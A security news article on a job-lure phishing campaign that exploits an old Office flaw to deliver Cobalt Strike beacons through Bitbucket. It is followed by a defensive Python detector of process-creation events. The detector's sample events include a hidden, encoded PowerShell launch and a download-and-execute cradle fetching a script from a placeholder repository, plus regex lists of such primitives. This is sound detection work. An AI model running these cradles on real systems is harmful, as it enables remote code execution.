
New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons

A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.

“The payload discovered is a leaked version of a Cobalt Strike beacon,” Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday.

“The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, showing the redirection technique to masquerade the beacon’s traffic.”

The malicious activity, discovered in August 2022, attempts to exploit CVE-2017-0199, a remote code execution vulnerability in Microsoft Office that allows an attacker to take control of an affected system.

The entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. government and the Public Service Association, a trade union based in New Zealand.

Cobalt Strike beacons are far from the only malware samples deployed, as Cisco Talos said it has also observed the use of the Redline Stealer and Amadey botnet executables as payloads at the other end of the attack chain.

Calling the attack methodology “highly modularized,” the cybersecurity company said the activity also stands out for its use of Bitbucket repositories to host malicious content that serves as a starting point for downloading a Windows executable responsible for deploying the Cobalt Strike DLL beacon.

In an alternative attack sequence, the Bitbucket repository functions as a conduit to deliver obfuscated VB and PowerShell downloader scripts that install the beacon hosted on a different Bitbucket account.

“This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim’s system memory,” the researchers said.

“Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker’s attempts in the earlier stage of the attack’s infection chain.”
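The chain described above (a Word document spawning a script interpreter, obfuscated VB and PowerShell downloaders pulling stages from a Bitbucket repository, and scripts executed in memory) leaves a recognizable trail in process-creation telemetry. The following added example, which is not from the Talos report or this article, shows the kind of layered detection logic a defender could run over Sysmon-style process-creation events. The event lines, file paths, repository URL and encoded string are all constructed for illustration; only the general behaviours (Office parent spawning a script host, PowerShell with an encoded command or download cradle, a download from bitbucket.org on the command line) come from the page.

```python
import json
import re

# Constructed sample events in a simplified Sysmon Event ID 1 (process creation)
# shape, serialized as JSON lines. None of these values are real indicators.
SAMPLE_EVENTS = [
    json.dumps({
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'wscript.exe C:\Users\victim\AppData\Local\Temp\update.vbs',
    }),
    json.dumps({
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        # -enc value is a placeholder, not a real encoded script
        "CommandLine": "powershell.exe -w hidden -ep bypass -enc QQBCAEMARABFAEYA",
    }),
    json.dumps({
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        # hypothetical repository path; bitbucket.org is the host named in the article
        "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://bitbucket.org/example-account/repo/raw/main/stage2.ps1')\"",
    }),
    json.dumps({  # benign: user opens a document from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r'"WINWORD.EXE" /n "C:\Users\victim\Documents\report.docx"',
    }),
    json.dumps({  # benign: ordinary administrative PowerShell
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process | Sort-Object CPU",
    }),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -e / -ec / -enc / -EncodedCommand as a standalone switch
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)")
# common PowerShell download-and-execute primitives
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|invoke-expression|\biex\b|net\.webclient)")
# public code-hosting service used as a staging point in the campaign
CODE_HOST = re.compile(r"(?i)https?://(www\.)?bitbucket\.org/")


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return a list of detection labels for one process-creation event."""
    findings = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")

    # Layer 1: an Office application should not be launching script hosts.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office_spawned_script_host:{parent}->{image}")

    # Layer 2: PowerShell launched with an encoded command or a download cradle,
    # the usual shape of a "generate and execute in memory" downloader.
    if image in POWERSHELL:
        if ENCODED_FLAG.search(cmd):
            findings.append("powershell_encoded_command")
        if DOWNLOAD_CRADLE.search(cmd):
            findings.append("powershell_download_cradle")

    # Layer 3: stage retrieval from a public repository host on the command line.
    if CODE_HOST.search(cmd):
        findings.append("public_repo_download_in_cmdline")

    return findings


def scan(lines):
    """Parse JSON event lines and return (index, findings) for each flagged event."""
    results = []
    for i, line in enumerate(lines):
        findings = analyze_event(json.loads(line))
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(labels)}")
```

Each layer on its own would produce noise in a real environment (administrators do use encoded commands, and developers do fetch from bitbucket.org); the value is in correlating them along the parent-child chain, which is why the output keeps the event index so a second pass can tie the Office-spawned script host to the PowerShell download it launched.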
